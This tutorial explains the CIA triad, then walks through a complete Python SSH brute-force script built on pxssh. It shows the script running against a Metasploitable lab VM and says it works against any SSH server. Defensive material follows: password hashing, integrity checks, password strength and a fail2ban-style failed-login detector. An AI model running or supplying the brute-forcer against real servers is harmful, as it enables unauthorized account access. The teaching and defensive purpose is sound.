
The CIA Triad and SSH Brute-Forcing


How an SSH brute-force attack works, and how to prevent one.


Confidentiality

Confidentiality is the aspect of security concerned with restricting access to private information. Put simply, a person who is allowed to access some information is verified to be someone that information belongs to. "Where does authentication fit in?" you may ask. Authentication is one part of confidentiality, together with identification and authorization; these three together are the key to achieving confidentiality.

  • Identification: the ability to identify a user of a system, or an application running on the system.
  • Authentication: the ability to prove that a user or application is genuinely who that person, or what that application, claims to be.
  • Authorization: the mechanism used to determine a user's privileges or access level for system resources.

Let's look at an example to better understand confidentiality.

For example, a user logs in to Alibaba Cloud to manage his cloud services by entering his username and password (identification). The system checks his credentials against a database or a file (authentication). If all looks good, the user is logged into his workspace and sees only what is meant for him (authorization).
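The three steps of that login, as an added example written for this article rather than code from Alibaba Cloud or the original post. The user store, the role table and the passwords are constructed; the point is that the system keeps only a salted PBKDF2 hash of each password (so a stolen store does not reveal credentials), compares it in constant time, and only then consults the authorization table:

```python
import hashlib
import hmac
import os

# Constructed in-memory user store for this example: username -> (salt, hash, role).
# Only a salted PBKDF2-HMAC-SHA256 hash of the password is kept, never the password.
USERS = {}

# Constructed authorization table: which role may reach which resource.
PERMISSIONS = {
    "admin": {"billing", "instances", "users"},
    "operator": {"instances"},
}


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def register(username: str, password: str, role: str) -> None:
    salt = os.urandom(16)
    USERS[username] = (salt, _hash_password(password, salt), role)


def authenticate(username: str, password: str) -> bool:
    """Identification: look up the claimed username.
    Authentication: prove the offered password matches the stored hash."""
    record = USERS.get(username)
    if record is None:
        # Unknown identity: hash anyway so the response time does not reveal
        # which usernames exist (dummy salt, result discarded).
        _hash_password(password, b"\x00" * 16)
        return False
    salt, stored_hash, _role = record
    # Constant-time comparison avoids leaking how many leading bytes matched.
    return hmac.compare_digest(_hash_password(password, salt), stored_hash)


def authorize(username: str, resource: str) -> bool:
    """Authorization: does the authenticated user's role permit this resource?"""
    _salt, _hash, role = USERS[username]
    return resource in PERMISSIONS.get(role, set())


def access(username: str, password: str, resource: str) -> str:
    """Run the three steps in order and report the outcome."""
    if not authenticate(username, password):
        return "denied: bad credentials"
    if not authorize(username, resource):
        return "denied: not permitted"
    return "granted"


if __name__ == "__main__":
    register("alice", "correct horse battery staple", "operator")
    register("bob", "hunter2-but-much-longer", "admin")
    print(access("alice", "correct horse battery staple", "instances"))  # granted
    print(access("alice", "correct horse battery staple", "billing"))    # denied: not permitted
    print(access("mallory", "anything", "billing"))                      # denied: bad credentials
```

Note that the two "denied" messages are deliberately different only for the reader of this example; a production login page should return the same message for an unknown user and a wrong password, for the same reason the code hashes a dummy value when the user does not exist.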

Other ways to achieve confidentiality are physical protection, such as locking server rooms, and protecting data with a cryptographic algorithm such as hashing.

Integrity

Integrity involves maintaining the consistency, accuracy, and trustworthiness of data. It is a principle of the CIA triad designed to protect data from deletion or modification by any unauthorized party. It also ensures that when an authorized person makes a change that should not have been made, the damage can be reversed. Integrity is implemented using security mechanisms such as data encryption and hashing. It is also important to have a backup procedure and redundant systems in place to ensure data integrity.
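How hashing and a backup work together for integrity, as an added example (not from the original article). It uses an HMAC rather than a bare hash: a bare SHA-256 of a record can be recomputed by whoever modified the record, while a keyed tag can only be produced by someone holding the key. The key and the records are constructed for the example:

```python
import hashlib
import hmac

# Constructed example key; in a real system it comes from a secret store, not source code.
INTEGRITY_KEY = b"constructed-demo-key-for-this-example"


def tag(record: bytes) -> bytes:
    """Integrity tag for a record: HMAC-SHA256 under a key only the system knows.
    A plain hash would not do, because anyone who modifies the record could
    simply recompute the hash; the key is what makes the tag unforgeable."""
    return hmac.new(INTEGRITY_KEY, record, hashlib.sha256).digest()


def verify(record: bytes, expected_tag: bytes) -> bool:
    """Constant-time check that the record still matches its tag."""
    return hmac.compare_digest(tag(record), expected_tag)


def restore(record: bytes, expected_tag: bytes, backup: bytes) -> bytes:
    """Return the record if intact; otherwise reverse the damage from the backup.
    The backup must itself verify against the same tag before it is trusted,
    since an attacker who can alter the live copy may reach the backup too."""
    if verify(record, expected_tag):
        return record
    if verify(backup, expected_tag):
        return backup
    raise ValueError("both the live record and the backup fail the integrity check")


if __name__ == "__main__":
    original = b"account=42;balance=100"
    t = tag(original)                       # stored alongside the record
    tampered = b"account=42;balance=100000"  # unauthorized modification
    print(verify(original, t), verify(tampered, t))  # True False
    print(restore(tampered, t, original))            # b'account=42;balance=100'
```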

Availability

Availability ensures that information and resources are reachable by those who may request them at any time. Availability is best ensured by rigorously maintaining all hardware, performing hardware repairs immediately when needed, and maintaining a functioning operating system environment that is free of conflicts. Providing adequate communication bandwidth and preventing the occurrence of bottlenecks are equally important.

Redundancy, failover, and RAID can mitigate the serious consequences of hardware failures. Fast and adaptive disaster recovery is essential for worst-case scenarios. To prevent data loss, a backup copy should be stored in a geographically isolated location. Extra security equipment or software, such as firewalls, proxy servers, and load balancers, can also improve responsiveness, increase availability, and guard against downtime and unreachable data caused by malicious actions such as denial-of-service (DoS) attacks and network intrusions.

SSH Brute-Forcing 

Now that we've familiarized ourselves with the CIA Triad, let's segue into a popular topic in cybersecurity: SSH brute-forcing. There are two key concepts that you need to know: SSH and brute-forcing. Before writing our code, let me explain each concept.

SSH

SSH stands for Secure Shell. It was developed in 1995 as a replacement for rlogin, telnet, and rsh, all of which were vulnerable to sniffing attacks, in which an attacker can read all data crossing the network. When the service is running on a system, it listens on port 22 by default. To find out whether your SSH port is active, run netstat -atnp | grep ssh; if the service is running, you will see something like this:

tcp   0  0 0.0.0.0:22  0.0.0.0:*  LISTEN  8377/sshd
tcp6  0  0 :::22       :::*       LISTEN  8377/sshd


SSH uses public-key cryptography: it generates a private and public key pair and uses them to protect data in transit on the network. We won't cover cryptography here, as it deserves its own article. In short, SSH is the encrypted replacement for the protocols used for remote system administration.

Brute-Forcing

Brute-forcing is a technique for finding credentials on a system by trying multiple combinations of entries until the correct one is found. When we use a file of candidate credentials, we are talking about a dictionary attack; when we try every possibility, including special characters, we are talking about brute-forcing. A dictionary attack can also contain special characters, but it does not cover all possibilities. In summary, a brute-force attack is a technique used to find the credentials of a computer (end-user machine, router, or server).

Example

After the information-gathering phases (passive and active), you may find several ports open (22, 145, 21, 53, 80). If you want to access the system remotely and there is no exploit for a remote attack, you need credentials. Now that we understand the theory, let's see how an SSH brute-force attack works in practice.

The script will have four parts: the imports, a connect function, a main function, and the entry-point check.

To start, let's import our modules.

from pexpect import pxssh
import termcolor
import sys


pxssh: the most important module in our script, because it is the one we use to connect to the SSH port.

termcolor: used to color the password when a login succeeds.

sys: used to read arguments from the shell.

Now let's continue by writing our connect function.

def connect(host, user, password):
    try:
        ssh = pxssh.pxssh()
        ssh.force_password = True
        ssh.login(host, user, password)
        print("password found " + termcolor.colored(user + ":" + password, 'yellow'))
        ssh.logout()
    except pxssh.ExceptionPxssh as e:
        # raised when the login is refused or no shell prompt is found
        print(e)
    except KeyboardInterrupt:
        print("\n")
        print("terminate")
        print("reason: program stopped by user")
        sys.exit(0)


As you can see, the connect function has three parameters: host, user, and password. It tries to connect to the host with the username and password it receives and prints the credentials (username, password) when the login succeeds. If the connection does not succeed, it prints the reason.

Let's continue with the main function.

def main():
    if len(sys.argv) < 4:
        print("Usage: python {0} host userfile passfile".format(sys.argv[0]))
        print(" ")
        print("Example: python {0} 192.168.10.2 tot.txt tit.txt".format(sys.argv[0]))
        sys.exit(0)
    host = sys.argv[1]
    # Read both files once up front: re-reading passfile inside the user loop
    # would return nothing after the first user, because the file position
    # would already be at the end.
    with open(sys.argv[2], 'r') as userfile:
        users = [u.strip("\n") for u in userfile.readlines()]
    with open(sys.argv[3], 'r') as passfile:
        passwords = [d.strip("\n") for d in passfile.readlines()]
    for user in users:
        for password in passwords:
            print(user + ":" + password)
            connect(host, user, password)


The main function is the one that checks the parameters. If all parameters are given, it tries every password in the password file against every user in the user file to find the correct credentials.

The last part does not need a screenshot, because all it does is check whether this file is being run as the main module and, if so, start the main function.

This is the line of code:

if __name__ == "__main__":
    main()

Now let's see if our code is doing its job.

I have my virtual machine (Metasploitable) with port 22 and other ports open. So I'll try to brute-force its credentials.

thewind@windows:~/Documents/workstation/python/violent$ python3.6 sshBru.py
Usage: python %prog -host -userfile -passfile

Example: python sshBru.py 192.168.10.2 tot.txt titi.txt
thewind@windows:~/Documents/workstation/python/violent$ python3.6 sshBru.py 192.168.43.138 dict.txt user.txt
msfadmin:password
password refused
masfadmin:masfadmin
password found msfadmin:msfadmin
masfadmin:admin
password refused
msfadmin:user
password refused
masfadmin:linux
^C

terminate
raison:program stop by user
the wind@windows:~/Documents/workstation/python/violent$


You can see that the script found the credentials present in our password file. The script works the same way against any SSH server, private or public.

Protecting Yourself from SSH Brute Force

Now that we have seen how a password is cracked, the question is, "What can we do to protect ourselves from this attack?" In this last part, we are going to talk about how to protect yourself against password hacking.

The CIA triad is a model designed to guide information-security policies within an organization. The "C" stands for confidentiality. Confidentiality is implemented by applying access restrictions, and one good access-restriction implementation is password protection.

Password protection is implemented in different ways depending on the application or the system organization, so we are going to talk about some general techniques to protect against password hacking.

1. Strong Password

Let's imagine that you have an account on Alibaba Cloud for your online business, and Alibaba provides a good security system to protect you against hackers. But let's say your password is your birth date, or something simple like "abc123". With a simple guess, a hacker can quickly gain access to your account and compromise your entire system. To avoid this problem, the first and best solution is to use a strong password. A strong password contains more than seven characters and uses a combination of upper- and lower-case letters, special characters, and numbers. Such a password can take a very long time to crack with a normal (personal) computer. There are also password generators you can use, depending on your needs.
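The rule above, turned into a checker, as an added example that is not from the original article. It also puts a number on "a very long time": the size of the space a brute-forcer has to cover grows with both the length and the number of character classes, and the assumed guessing rate (1e9 per second, typical of an offline attack on a stolen hash; an online attack against SSH is many orders of magnitude slower because every guess is a network round trip) is a constructed parameter, not a measurement:

```python
import string

CLASSES = (string.ascii_lowercase, string.ascii_uppercase, string.digits, string.punctuation)
FULL_ALPHABET = sum(len(c) for c in CLASSES)   # 26 + 26 + 10 + 32 = 94


def alphabet_size(password: str) -> int:
    """Size of the smallest character set that covers every class the password uses.
    An attacker who knows which classes are present needs to search only that set."""
    size = 0
    for charset in CLASSES:
        if any(ch in charset for ch in password):
            size += len(charset)
    return size


def is_strong(password: str) -> bool:
    """The article's rule: more than seven characters, all four classes present."""
    return len(password) > 7 and alphabet_size(password) == FULL_ALPHABET


def guesses_to_exhaust(password: str) -> int:
    """Candidates needed to cover every password of this length over this alphabet."""
    return alphabet_size(password) ** len(password)


def years_to_exhaust(password: str, guesses_per_second: float = 1e9) -> float:
    """Worst-case time for a brute-forcer at the given (constructed) rate."""
    return guesses_to_exhaust(password) / guesses_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    for pw in ("abc123", "Xk9!mQ2r", "Xk9!mQ2r-Lp7#vT4"):
        print("{:18} strong={!s:5} alphabet={:3} years={:.3g}".format(
            pw, is_strong(pw), alphabet_size(pw), years_to_exhaust(pw)))
```

The output makes the point of the section concrete: "abc123" falls in well under a second, the eight-character password that satisfies the rule holds for a fraction of a year at that rate, and doubling the length multiplies the search space by 94 to the eighth power. Length buys far more than one extra character class does.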

2. Be Wary of Phishing

Phishing is a technique hackers use to obtain a user's sensitive information (username, password, card number, etc.). The best way to protect yourself from this type of attack is to be careful about the links you click.

Let's use a scenario to explain further. You receive an email, apparently about your account, from "Alibbaba Cloud" saying that someone tried to access your account and that you should share your credentials for further verification. You enter your information quickly, but there is a problem: you were not careful when checking the name "Alibbaba Cloud", and because of this you gave your information to a hacker. To prevent this, always double-check the links in your email, and whenever there is doubt, reach out to the supposed company's support team.

3. Use Fail2ban

Say you have an ECS instance set up on Alibaba Cloud and you connect to it through SSH. How can you protect yourself from SSH password cracking? One of the best solutions is fail2ban. Fail2ban is an intrusion-prevention framework that watches log files such as the sshd authentication log and protects you against brute-force attacks by temporarily banning the IP addresses that generate too many failed logins.
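What fail2ban's sshd jail actually does is count "Failed password" lines per source address and ban an address once it exceeds maxretry failures inside a findtime window. The detector below reproduces that rule on constructed auth.log lines so you can see how the script from the earlier section looks from the server side. This is an added example, not fail2ban's own code or code from the original article; the log lines, host name, addresses and the assumed year are all constructed:

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of the syslog-style lines sshd writes to /var/log/auth.log.
# 192.0.2.10 is hammering the server; 198.51.100.7 is a legitimate login.
SAMPLE_LOG = """\
Mar  3 10:00:01 ecs sshd[2311]: Failed password for invalid user admin from 192.0.2.10 port 51122 ssh2
Mar  3 10:00:03 ecs sshd[2311]: Failed password for msfadmin from 192.0.2.10 port 51123 ssh2
Mar  3 10:00:04 ecs sshd[2311]: Failed password for msfadmin from 192.0.2.10 port 51124 ssh2
Mar  3 10:00:05 ecs sshd[2311]: Accepted password for msfadmin from 198.51.100.7 port 40000 ssh2
Mar  3 10:00:06 ecs sshd[2311]: Failed password for msfadmin from 192.0.2.10 port 51125 ssh2
Mar  3 10:00:07 ecs sshd[2311]: Failed password for root from 192.0.2.10 port 51126 ssh2
Mar  3 10:30:00 ecs sshd[2311]: Failed password for root from 203.0.113.5 port 2222 ssh2
"""

# Matches the "Failed password" line sshd logs for a rejected login attempt.
FAILED_LOGIN = re.compile(
    r"^(?P<stamp>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_stamp(stamp: str, year: int = 2024) -> datetime:
    """Syslog timestamps carry no year, so one is assumed (constructed: 2024)."""
    return datetime.strptime("{} {}".format(year, stamp), "%Y %b %d %H:%M:%S")


def find_bans(log_text: str, maxretry: int = 5, findtime: int = 600) -> dict:
    """Return {ip: time_of_ban} for every source IP that produced at least
    `maxretry` failed logins within a `findtime`-second window; this is the rule
    fail2ban's sshd jail applies with its maxretry and findtime settings."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    bans = {}
    for line in log_text.splitlines():
        m = FAILED_LOGIN.match(line)
        if m is None:
            continue                # accepted logins and other noise are not counted
        ip, ts = m.group("ip"), parse_stamp(m.group("stamp"))
        if ip in bans:
            continue                # already banned; its packets would be dropped
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > findtime:
            window.popleft()        # forget failures that fell out of the window
        if len(window) >= maxretry:
            bans[ip] = ts
    return bans


if __name__ == "__main__":
    for ip, when in find_bans(SAMPLE_LOG).items():
        print("ban {} at {}".format(ip, when.time()))   # ban 192.0.2.10 at 10:00:07
```

Run against the sample, the attacker's address is banned on its fifth failure and the one-off failure from 203.0.113.5 is ignored. With a real fail2ban installation the equivalent is an [sshd] section in jail.local with enabled = true and the maxretry, findtime and bantime values you want; the ban itself is then enforced through the firewall rather than by a script.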

4. Regular Password Changing

As mentioned before, a strong password makes life difficult for hackers. But note that a hacker never gives up easily: hackers may keep scanning for various possibilities, or search browser history for any stored password or data. The best way to address all of this is to change your password regularly, so that even when a hacker discovers your password, he will not be able to use your account for long.

How often should you change your password? Well, it depends. For mission-critical systems, you normally have to do it every week. For services seldom exposed to the internet, you can get away with keeping the same password for as long as six months.


Published at DZone with permission of

